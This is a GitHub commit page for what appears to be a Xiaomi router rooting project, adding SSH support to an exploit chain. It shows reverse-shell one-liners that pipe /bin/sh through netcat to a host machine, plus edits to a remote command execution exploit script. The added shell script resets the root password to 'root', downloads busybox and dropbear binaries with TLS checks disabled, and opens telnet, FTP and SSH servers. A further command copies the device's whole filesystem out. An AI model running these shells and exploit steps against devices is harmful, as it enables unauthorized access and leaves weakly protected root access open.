Add support for SSH

acecilia · Nov 21, 2020 · b7cdf19 · b7cdf19
1 parent 77ba9e4
commit b7cdf19
Show file tree

Hide file tree

Showing 6 changed files with 75 additions and 15 deletions.
diff --git a/extras/various/cmds.txt b/extras/various/cmds.txt
@@ -31,3 +31,18 @@ tail -f /tmp/messages | grep predownload-ota
 ((export file="/tmp/a"; export port="4444";rm -rf $file; mkfifo $file;cat $file|/bin/sh -i 2>&1|nc 192.168.0.23 $port >$file)&)
 ((export file="/tmp/b"; export port="4450";rm -rf $file; mkfifo $file;cat $file|/bin/sh -i 2>&1|nc 192.168.0.23 $port >$file)&)
 
+# Copy all filesystem to host machine
+ssh \
+-oKexAlgorithms=+diffie-hellman-group1-sha1 \
+-c 3des-cbc \
+-o UserKnownHostsFile=/dev/null \
+[email protected] \
+/tmp/busybox tar czvf - \
+--exclude 'sys/bus/*' \
+--exclude 'sys/devices/*' \
+--exclude 'sys/class/firmware/timeout' \
+--exclude 'sys/kernel/rcu_expedited' \
+--exclude 'sys/kernel/*' \
+--exclude 'sys/module/sg/srcversion' \
+--exclude 'sys/module/*' \
+/ > /Users/andres/Desktop/file.tar.gz
diff --git a/remote_command_execution_vulnerability.py b/remote_command_execution_vulnerability.py
@@ -19,7 +19,7 @@
 import requests
 
 router_ip_address = "192.168.31.1"
-router_ip_address = input("Router IP address [press enter for using the default {router_ip_address}]: ") or router_ip_address
+router_ip_address = input("Router IP address [press enter for using the default {}]: ".format(router_ip_address)) or router_ip_address
 
 # get stok
 stok = input("stok: ")
@@ -74,7 +74,7 @@
     proxies=proxies
 )
 # print(r2.text)
-
-print("done! Now you can connect to the router using telnet (user: root, password: none)")
-print("In MacOS, execute in the terminal:")
-print("telnet {}".format(router_ip_address))
+print("done! Now you can connect to the router using several options: (user: root, password: root)")
+print("* telnet {}".format(router_ip_address))
+print("* ssh -oKexAlgorithms=+diffie-hellman-group1-sha1 -c 3des-cbc -o UserKnownHostsFile=/dev/null root@{}".format(router_ip_address))
+print("* ftp: using a program like cyberduck")
diff --git a/script.sh b/script.sh
@@ -3,29 +3,70 @@
 set -euo pipefail
 
 exploit() {
-    ########################################
-    # Download standalone busybox and start telnet and ftp servers
-    ########################################
+    setup_password
+    setup_busybox
+    start_telnet
+    start_ftp
+    start_ssh
+    echo "Done exploiting"
+}
 
-    passwd -d root # Remove root password, as the default one set by xiaomi is unknown
+setup_password() {
+    # Override existing password, as the default one set by xiaomi is unknown
+    # https://www.systutorials.com/changing-linux-users-password-in-one-command-line/
+    echo -e "root\nroot" | passwd root
+}
 
+setup_busybox() {
     # kill/stop telnet, in case it is running from a previous execution
     pgrep busybox | xargs kill || true
 
     cd /tmp
     rm -rf busybox
     # Rationale for using --insecure: https://github.com/acecilia/OpenWRTInvasion/issues/31#issuecomment-690755250
-    curl "https://www.busybox.net/downloads/binaries/1.31.0-defconfig-multiarch-musl/busybox-mipsel" --insecure --output busybox
+    curl -L "https://github.com/acecilia/OpenWRTInvasion/raw/master/script_tools/busybox-mipsel" --insecure --output busybox
     chmod +x busybox
+}
 
-    # Start telnet
-    ./busybox telnetd
-
-    # Start FTP server
+start_ftp() {
+    cd /tmp
     ln -sfn busybox ftpd # Create symlink needed for running ftpd
     ./busybox tcpsvd -vE 0.0.0.0 21 ./ftpd -Sw / >> /tmp/messages 2>&1 &
+}
 
-    echo "Done exploiting"
+start_telnet() {
+    cd /tmp
+    ./busybox telnetd
+}
+
+start_ssh() {
+    cd /tmp
+
+    # Clean
+    rm -rf dropbear
+    rm -rf dropbear.tar.bz2
+    rm -rf /etc/dropbear
+
+    # kill/stop dropbear, in case it is running from a previous execution
+    pgrep dropbear | xargs kill || true
+
+    # Donwload dropbear static mipsel binary
+    curl -L "https://github.com/acecilia/OpenWRTInvasion/raw/master/script_tools/dropbearStaticMipsel.tar.bz2" --output dropbear.tar.bz2
+    mkdir dropbear
+    /tmp/busybox tar xvfj dropbear.tar.bz2 -C dropbear --strip-components=1
+
+    # Add keys
+    # http://www.ibiblio.org/elemental/howto/dropbear-ssh.html
+    mkdir -p /etc/dropbear
+    cd /etc/dropbear
+    /tmp/dropbear/dropbearkey -t rsa -f dropbear_rsa_host_key
+    /tmp/dropbear/dropbearkey -t dss -f dropbear_dss_host_key
+
+    # Start SSH server
+    /tmp/dropbear/dropbear
+
+    # https://unix.stackexchange.com/a/402749
+    # Login with ssh -oKexAlgorithms=+diffie-hellman-group1-sha1 -c 3des-cbc [email protected]
 }
 
 remount() {

diff --git a/script_tools/README.md b/script_tools/README.md
@@ -0,0 +1,4 @@
+# Tools sources
+
+* busybox: https://www.busybox.net/downloads/binaries/1.31.0-defconfig-multiarch-musl/busybox-mipsel
+* dropbear: https://sites.google.com/site/mipsellinuxwithfirmwarehowto/firmwarehowto/builddropbear-static-mipsel
diff --git a/script_tools/busybox-mipsel b/script_tools/busybox-mipsel
diff --git a/script_tools/dropbearStaticMipsel.tar.bz2 b/script_tools/dropbearStaticMipsel.tar.bz2